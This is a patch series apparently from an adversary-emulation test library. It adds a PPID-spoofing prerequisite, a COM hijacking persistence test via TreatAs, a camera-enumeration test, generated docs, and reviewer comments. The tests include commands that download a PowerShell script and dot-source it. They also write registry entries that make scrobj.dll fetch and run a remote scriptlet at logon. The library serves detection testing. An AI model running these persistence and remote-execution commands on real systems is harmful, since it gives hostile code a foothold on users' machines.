From a43555eab098ae822c710e01ace273a6b8ce6f3b Mon Sep 17 00:00:00 2001 From: TaintedHorizon Date: Thu, 28 Jul 2022 14:28:41 -0700 Subject: [PATCH 01/22] update dependencies (#2053) Test does not currently execute remotely because ppid-spoof.ps1 does not get copied remotely. --- atomics/T1134.004/T1134.004.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/atomics/T1134.004/T1134.004.yaml b/atomics/T1134.004/T1134.004.yaml index 57bf810f..e05ab373 100644 --- a/atomics/T1134.004/T1134.004.yaml +++ b/atomics/T1134.004/T1134.004.yaml @@ -41,6 +41,13 @@ atomic_tests: get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" + - description: | + PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 + prereq_command: | + if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 executor: command: | . $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 From b13fb3c35e75c6e8cfbf6e4d72da22fe696ba9b1 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Thu, 28 Jul 2022 21:29:24 +0000 Subject: [PATCH 02/22] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/index.yaml | 20 ++++++++++++++++++++ atomics/T1134.004/T1134.004.md | 10 ++++++++++ 2 files changed, 30 insertions(+) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 186b390a..ef16519d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
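Review bot: The three new `$PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1` references in the added prereq block are unquoted, so `Test-Path`, `split-path` and `-OutFile` all break if the atomics folder path contains a space, whereas the calc.dll prereq just above already quotes `"#{dll_path}"`; wrap each one as `"$PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1"`. The description names the file `PPID.ps1` while the path and the executor use `PPID-Spoof.ps1`; `PPID-Spoof.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1` keeps them consistent. Because get_prereq_command fetches the script from the master branch at run time, the file a runner ends up dot-sourcing is whatever that branch holds at that moment rather than a pinned revision; referencing a specific commit in the raw URL would make the test reproducible and easier to vet.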
@@ -15727,6 +15727,16 @@ defense-evasion: get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" + - description: 'PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 + + ' + prereq_command: 'if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) + {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 executor: command: | . $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 @@ -34335,6 +34345,16 @@ privilege-escalation: get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" + - description: 'PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 + + ' + prereq_command: 'if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) + {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 executor: command: | . $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md index 8702ca75..745d7f29 100644 --- a/atomics/T1134.004/T1134.004.md +++ b/atomics/T1134.004/T1134.004.md 
@@ -75,6 +75,16 @@ if (Test-Path #{dll_path}) {exit 0} else {exit 1} New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" ``` +##### Description: PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 +##### Check Prereq Commands: +```powershell +if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 +``` From b05d6193da7e2606d88f98598ea9950e74c11ef1 Mon Sep 17 00:00:00 2001 From: tccontre <26181693+tccontre@users.noreply.github.com> Date: Fri, 29 Jul 2022 17:02:55 +0200 Subject: [PATCH 03/22] Windows camera info gathering (#2056) * Create T1592.001.md * Create T1592.001.yml --- atomics/T1592.001/T1592.001.md | 26 ++++++++++++++++++++++++++ atomics/T1592.001/T1592.001.yml | 15 +++++++++++++++ 2 files changed, 41 insertions(+) create mode 100644 atomics/T1592.001/T1592.001.md create mode 100644 atomics/T1592.001/T1592.001.yml diff --git a/atomics/T1592.001/T1592.001.md b/atomics/T1592.001/T1592.001.md new file mode 100644 index 00000000..666f2943 --- /dev/null +++ b/atomics/T1592.001/T1592.001.md @@ -0,0 +1,26 @@ +# T1592.001 - Gather Victim Host Information: Hardware +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1592/001/) +
Adversaries may use powershell script to gather information about the system, configuration, and even mounted hardware on the target host. + + Dark Crystal Rat use several technique to gather hardware information of the compromised host like gathering the microphone, CPU, GPU, camera and many as part of its data collection and backdoor capabilities. +
+ +## Atomic Tests + +- [Atomic Test #1 - Query Registry](#atomic-test-1---Enumerate PlugNPlay Camera) + + +
+ +## Atomic Test #1 - Query Registry +Enumerate PlugNPlay Camera. +Upon successful execution, powershell.exe will perform queries to plugnplay camera device mounted on the host. +References: + +https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor + +https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat + +**Supported Platforms:** Windows + +**auto_generated_guid:** 08a04133-3f2a-4eb0-bdd8-2aa513d2fb60 diff --git a/atomics/T1592.001/T1592.001.yml b/atomics/T1592.001/T1592.001.yml new file mode 100644 index 00000000..dcd9be43 --- /dev/null +++ b/atomics/T1592.001/T1592.001.yml @@ -0,0 +1,15 @@ +attack_technique: T1592.001 +display_name: 'Gather Victim Host Information: Hardware' +atomic_tests: +- name: Enumerate PlugNPlay Camera + auto_generated_guid: d430bf85-b656-40e7-b238-42db01df0183 + description: | + Enumerate PlugNPlay Camera using powershell commandlet. this technique was seen in dcrat malware backdoor capabilities where it enumerate the camera info mounted on the compromised host. + reference: https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor + supported_platforms: + - windows + executor: + command: | + Get-CimInstance -Query "SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')" + name: powershell + elevation_required: true From c343036e0c5a6e761b4f166b71b93107a2632194 Mon Sep 17 00:00:00 2001 From: Jacques Decarie Date: Fri, 29 Jul 2022 11:06:38 -0400 Subject: [PATCH 04/22] T1546.015 COM hijacking via TreatAs (#2050) * adding TreatAs * removing sct_path * fixing executor name * fixing references * fixing references Co-authored-by: Carrie Roberts --- atomics/T1546.015/T1546.015.yaml | 38 +++++++++++++++++++++++++++++++ atomics/T1546.015/src/TreatAs.sct | 22 ++++++++++++++++++ 2 files changed, 60 insertions(+) create mode 100644 atomics/T1546.015/src/TreatAs.sct diff --git a/atomics/T1546.015/T1546.015.yaml b/atomics/T1546.015/T1546.015.yaml index de990686..f962aa48 100644 
--- a/atomics/T1546.015/T1546.015.yaml +++ b/atomics/T1546.015/T1546.015.yaml 
@@ -95,3 +95,41 @@ atomic_tests: cleanup_command: |- Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore name: powershell +- name: COM hijacking via TreatAs + description: |- + This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute. + Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The + test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out. + + References: + + https://youtu.be/3gz1QmiMhss?t=1251 + + https://github.com/enigma0x3/windows-operating-system-archaeology + + supported_platforms: + - windows + executor: + command: |- + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /ve /T REG_SZ /d "AtomicTest" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00" /ve /T REG_SZ /d "AtomicTest" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /ve /T REG_SZ /d "AtomicTest" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /ve /T REG_SZ /d "C:\\WINDOWS\\system32\\scrobj.dll" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /v "ThreadingModel" /T REG_SZ /d "Apartment" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID" /ve /T REG_SZ /d "AtomicTest" /f + reg add 
"HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL" /ve /T REG_SZ /d "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID" /ve /T REG_SZ /d "AtomicTest" /f + + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f + + rundll32.exe -sta "AtomicTest" + + cleanup_command: |- + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f + name: powershell diff --git a/atomics/T1546.015/src/TreatAs.sct b/atomics/T1546.015/src/TreatAs.sct new file mode 100644 index 00000000..c5826f02 --- /dev/null +++ b/atomics/T1546.015/src/TreatAs.sct @@ -0,0 +1,22 @@ + + + + + + + + + \ No newline at end of file From 0b80c61208bb8716cd57a16f1a573518dec775ed Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Fri, 29 Jul 2022 15:07:10 +0000 Subject: [PATCH 05/22] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1546.015/T1546.015.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1546.015/T1546.015.yaml b/atomics/T1546.015/T1546.015.yaml index f962aa48..d938c90c 100644 --- a/atomics/T1546.015/T1546.015.yaml +++ b/atomics/T1546.015/T1546.015.yaml 
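Review bot: The cleanup_command of the new test does not remove `HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00`, which the executor creates together with its `CLSID` subkey, so every run leaves a ProgID pointing at the scriptlet CLSID behind; add `reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00" /f` alongside the other three deletes. Cleanup also deletes the whole `CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}` key from HKCU rather than only the `TreatAs` value the test added, so any pre-existing per-user override under that key would be lost; either delete just `...\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs` or state in the description that the key is expected not to exist beforehand. The scriptlet is fetched from the master branch at run time through `ScriptletURL`, so the test's behaviour depends on live repository contents and on outbound HTTPS from the host; a prereq that stages `TreatAs.sct` under `$PathToAtomicsFolder\T1546.015\src`, as the T1134.004 change earlier in this series does for its script, would make the test self-contained and auditable. Minor: `This test first create` should read `This test first creates`.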
@@ -96,6 +96,7 @@ atomic_tests: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore name: powershell - name: COM hijacking via TreatAs + auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9 description: |- This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute. Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 7c51f4fd..448eadfb 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1097,3 +1097,4 @@ df81db1b-066c-4802-9bc8-b6d030c3ba8e ae9b2e3e-efa1-4483-86e2-fae529ab9fb6 a27418de-bdce-4ebd-b655-38f11142bf0c 1e40bb1d-195e-401e-a86b-c192f55e005c +33eacead-f117-4863-8eb0-5c6304fbfaa9 From 8d57cd72e58746382cafbde8e3c72b7d351d1221 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Fri, 29 Jul 2022 15:07:16 +0000 Subject: [PATCH 06/22] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 76 +++++++++++++++++++ atomics/T1546.015/T1546.015.md | 59 ++++++++++++++ 6 files changed, 143 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 5b5e00cc..060e2d4e 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -530,6 +530,7 @@ privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,b privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell +privilege-escalation,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt privilege-escalation,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt 
@@ -755,6 +756,7 @@ persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4 persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell persistence,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell +persistence,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index c6268bef..ec7db3cd 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -394,6 +394,7 @@ privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,b privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell +privilege-escalation,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt 
@@ -551,6 +552,7 @@ persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4 persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell persistence,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell +persistence,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index fdabd1a3..abe3650f 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -841,6 +841,7 @@ - Atomic Test #1: COM Hijacking - InprocServer32 [windows] - Atomic Test #2: Powershell Execute COM Object [windows] - Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows] + - Atomic Test #4: COM hijacking via TreatAs [windows] - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows] - T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -1281,6 +1282,7 @@ - Atomic Test #1: COM Hijacking - InprocServer32 [windows] - Atomic Test #2: Powershell Execute COM Object [windows] - Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows] + - Atomic Test #4: COM hijacking via TreatAs [windows] - [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md) - Atomic Test #1: Install Outlook Home Page Persistence [windows] - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index a57d06c9..32fec16c 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -630,6 +630,7 @@ - Atomic Test #1: COM Hijacking - InprocServer32 [windows] - Atomic Test #2: Powershell Execute COM Object [windows] - Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows] + - Atomic Test #4: COM hijacking via TreatAs [windows] - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows] - T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -935,6 +936,7 @@ - Atomic Test #1: COM Hijacking - InprocServer32 [windows] - Atomic Test #2: Powershell Execute COM Object [windows] - Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows] + - Atomic Test #4: COM hijacking via TreatAs [windows] - [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md) - Atomic Test #1: Install Outlook Home Page Persistence [windows] - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index ef16519d..d9b81102 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -36918,6 +36918,44 @@ privilege-escalation: cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore name: powershell + - name: COM hijacking via TreatAs + auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9 + description: |- + This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute. + Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The + test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out. + + References: + + https://youtu.be/3gz1QmiMhss?t=1251 + + https://github.com/enigma0x3/windows-operating-system-archaeology + supported_platforms: + - windows + executor: + command: "reg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\" /ve + /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\" + /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\\CLSID\" + /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add + \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\\CLSID\" /ve /T + REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\" + /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\" + /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\" + /ve /T REG_SZ /d \"C:\\\\WINDOWS\\\\system32\\\\scrobj.dll\" /f\nreg add + \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\" + /v \"ThreadingModel\" /T REG_SZ /d \"Apartment\" /f\nreg add 
\"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ProgID\" + /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ScriptletURL\" + /ve /T REG_SZ /d \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\" + /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\VersionIndependentProgID\" + /ve /T REG_SZ /d \"AtomicTest\" /f\n\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\" + /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\TreatAs\" + /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\n\nrundll32.exe + -sta \"AtomicTest\" " + cleanup_command: |- + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f + name: powershell T1574.009: technique: x_mitre_platforms: 
@@ -58887,6 +58925,44 @@ persistence: cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore name: powershell + - name: COM hijacking via TreatAs + auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9 + description: |- + This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute. + Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The + test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out. + + References: + + https://youtu.be/3gz1QmiMhss?t=1251 + + https://github.com/enigma0x3/windows-operating-system-archaeology + supported_platforms: + - windows + executor: + command: "reg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\" /ve + /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\" + /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\\CLSID\" + /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add + \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\\CLSID\" /ve /T + REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\" + /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\" + /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\" + /ve /T REG_SZ /d \"C:\\\\WINDOWS\\\\system32\\\\scrobj.dll\" /f\nreg add + \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\" + /v \"ThreadingModel\" /T REG_SZ /d \"Apartment\" /f\nreg add 
